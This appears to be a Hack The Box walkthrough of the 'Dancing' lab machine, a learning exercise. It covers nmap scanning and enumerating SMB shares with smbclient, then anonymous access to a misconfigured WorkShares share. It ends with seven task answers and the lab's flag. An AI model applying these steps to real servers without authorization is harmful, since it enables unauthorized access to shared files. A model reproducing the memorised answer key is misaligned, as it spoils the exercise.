HacktheBox "machine" Dancing

Description

SMB (Server Message Block) is a network protocol primarily used for sharing files, printers, and other resources between computers on the same network, commonly seen on Windows systems. It runs over TCP port 445 and can also use NetBIOS over TCP/IP (NBT) on port 139 for older implementations. SMB operates at the Application and Presentation layers of the OSI model, relying on lower-level protocols for transport. During network scanning, these open ports can be detected, allowing for enumeration of shared resources.

Enumeration

I start, as always, by scanning the target once we are connected to the VPN. Running the following command will make nmap scan all of the ports and display service versions for each of them.

Ananlysis

Step:-1

The command is uses an Nmap command, which is used for network discovery and security auditing.

• sudo: This runs the command with elevated privileges, which is necessary because Nmap requires root access to perform some types of scanning, such as OS detection and service enumeration.
• nmap: This is the command-line tool used for network scanning.
• -sC: This option enables the default script scan.
• -sV: This option performs version detection.

sudo nmap -sC -sV 10.129.113.234        

Step:-2

Installing smbclient can be useful for several reasons, especially when working with SMB (Server Message Block) shares

sudo apt-get install smbclient        

Step:-3

The smbclient -L command is used in SMB (Server Message Block) protocol to list available shares on a remote server. Here’s how it works:

• smbclient: A command-line tool used to access shared files and printers on an SMB server.
• -L: The flag used to list all the available shares on the target machine or server.

smbclient -L 10.129.113.234        

Step:-4 Foothold

The NT_STATUS_ACCESS_DENIED is output, letting us know that we do not have the proper credentials to connect to this share. We will follow up with the C$ administrative share.

Step:-5

Success! The WorkShares SMB share was poorly configured, allowing us to log in without the appropriate credentials. We can see our terminal prompt changed to smb: \> , letting us know that our shell is now interacting with the service

Step:-6

• ls : listing contents of the directories within the share
• cd : changing current directories within the share
• get : downloading the contents of the directories within the share
• exit : exiting the smb shell

Step:-8

Finally, the flags have been identified

Task 1

What does the 3-letter acronym SMB stand for?

Server Message Block

Task 2

What port does SMB use to operate at?

445

Task 3

What is the service name for port 445 that came up in our Nmap scan?

microsoft -ds

Task 4

What is the 'flag' or 'switch' that we can use with the smbclient utility to 'list' the available shares on Dancing?

-L

Task 5

How many shares are there on Dancing?

4

Task 6

What is the name of the share we are able to access in the end with a blank password?

WorkShares

Task 7

What is the command we can use within the SMB shell to download the files we find?

Get

Submit Flag

Submit root flag

5f61c10dffbc77a704d76016a22f1664

Thanks for Visiting